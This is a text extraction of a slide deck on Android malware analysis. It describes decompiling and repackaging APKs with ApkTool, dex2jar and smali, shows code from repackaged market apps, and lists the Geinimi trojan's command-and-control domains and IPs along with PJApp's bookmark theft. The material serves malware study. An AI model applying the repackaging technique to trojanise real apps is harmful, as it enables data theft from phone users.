Download - Apk explorer2
![Page 1: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/1.jpg)
1
恶意软件Apk Explorer Series .2
![Page 2: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/2.jpg)
2
恶意软件@Android
![Page 3: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/3.jpg)
3
Nduo
N多做的
ApkApkNduo Apk
![Page 4: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/4.jpg)
4
如何实现
.apk
• Unzip
.dex
• Decompile• ApkTool[1]
• Dex2Jar[2]
.smali
• Modify• Smali[4]
new.apk
• Repack• ApkTool
![Page 5: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/5.jpg)
5
Wet feet
AlertDialog alertDialog = new AlertDialog.Builder(this).create();alertDialog.setTitle("LALALA");alertDialog.setMessage("You should see me!!!!!!!");alertDialog.show();
AlertDialog Java Code
![Page 6: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/6.jpg)
6
Wet feet cont.
new-instance v1, Landroid/app/AlertDialog$Builder;
#v1=(UninitRef);
invoke-direct {v1, p0}, Landroid/app/AlertDialog$Builder;-><init>(Landroid/content/Context;)V #v1=(Reference);
invoke-virtual {v1}, Landroid/app/AlertDialog$Builder;->create()Landroid/app/AlertDialog; move-result-object v0
.local v0, alertDialog:Landroid/app/AlertDialog; #v0=(Reference);
const-string v1, "LALALA" invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setTitle(Ljava/lang/CharSequence;)V
const-string v1, "You should see me!!!!!!!" invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setMessage(Ljava/lang/CharSequence;)V
invoke-virtual {v0}, Landroid/app/AlertDialog;->show()V
new-instance v1, Landroid/app/AlertDialog$Builder; #v1=(UninitRef); invoke-direct {v1, p0}, Landroid/app/AlertDialog$Builder;-><init>(Landroid/content/Context;)V #v1=(Reference); invoke-virtual {v1}, Landroid/app/AlertDialog$Builder;->create()Landroid/app/AlertDialog; move-result-object v0
.local v0, alertDialog:Landroid/app/AlertDialog; #v0=(Reference); const-string v1, "LALALA" invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setTitle(Ljava/lang/CharSequence;)V const-string v1, "You should see me!!!!!!!" invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setMessage(Ljava/lang/CharSequence;)V
invoke-virtual {v0}, Landroid/app/AlertDialog;->show()V
AlertDialog Op-code
![Page 7: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/7.jpg)
7
Wet feet cont..method public onCreate(Landroid/os/Bundle;)V .locals 12 .parameter "savedInstanceState" .prologue const/16 v11, 0x400
Yingyonghui Java code
SplashActivity.java
#v11=(PosShort); const/4 v10, 0x0
#v10=(Null); const/4 v9, 0x1
#v9=(One); invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
AlertDialog Op-code
![Page 8: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/8.jpg)
8
HideFile Java code
HideFiles.java
Wet feet cont.getPackageInfo("com.nduoa.market", 0);
(“使用N多市场, \n帮助维护「%s」的更
新?” , …)
localBuilder2.setPositiveButton("安装 ",
locald);
a.a("http://market.nduoa.com/update/nDuoaMarket.apk", str2);
i.a("KAWAHAeBUBLBaBBAMAPBRAEAIAWAMBdAKBbALAUABBCABBOAABdAQANAeABBaANAaABAOBPBTAGACBOATBDBAB");
![Page 9: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/9.jpg)
9
Geinimi[6]
![Page 10: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/10.jpg)
10
Geinimi cont.
www.widifu.comwww.udaore.com
www.frijd.comwww.islpast.comwww.piajesj.comwww.qoewsl.comwww.weolir.comwww.uisoa.comwww.riusdu.comwww.aiucr.com
117.135.134.185180.168.68.34
Geinimi
Access the user's geo-location based on coordinates given by the GPSSend or receive SMS messagesAccess the user's mailboxRead and modify the user's phonebook contactsRead and modify the user's browsing historyCheck running processes in memoryTerminate legitimate running process in the deviceInstall shortcutsPerform web queriesChange the wallpaper of the device
BoardBrandCPIDCPU ABIDeviceDIDDisplayFingerprintHostLine1 NumberManufacturerModelNetwork Country ISONetwork OperatorNetwork Operator NameNetwork TypePhone TypeProduct
PTIDSALESIDSDK versionShellSIM Country ISOSIM OperatorSIM Operator NameSIM Serial NumberSIM StateSoftware VersionSubscriber IDTagsTimeTypeUserVoice mail Number
![Page 11: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/11.jpg)
11
PJApp 泡椒 [3][5]
"content://browser/bookmarks"
MEEG
O91.C
OM
渠道激活
IMEI / SIM / IMSI / ICCIDPdus……
Default Browser
SEND ALL Bookmarks
ADDandroid.paojiao.cnct2.paojiao.cng3g3.cn
com.uc.browsercom.tencent.mttcom.opera.mini.androidmobi.mgeek.TunnyBrowsercom.skyfire.browsercom.kolbysoft.steelcom.android.browser
![Page 12: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/12.jpg)
12
MEEGO91.COMRegistrant:nduo deminanchang jiangxi sicA501nanchang, jiangxi 444001China
Registered through: GoDaddy.comCreated on: 05-Sep-10Expires on: 05-Sep-11
Administrative Contact:demi, nduo [email protected] jiangxi sicA501nanchang, jiangxi 444001China+86.861363345678
![Page 13: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/13.jpg)
13
Reference1. http://code.google.com/p/android-apktool/2. http://code.google.com/p/dex2jar/3. http://www.itnews.tk/archives/47614. http://code.google.com/p/smali/5. http://globalthreatcenter.com/?cat=186. http://blog.mylookout.com/_media/Geinimi_Trojan
_Teardown.pdf
![Page 14: Apk explorer2](https://reader033.vdocuments.pub/reader033/viewer/2022061123/54736034b4af9f9d0a8b531b/html5/thumbnails/14.jpg)
14
Question ?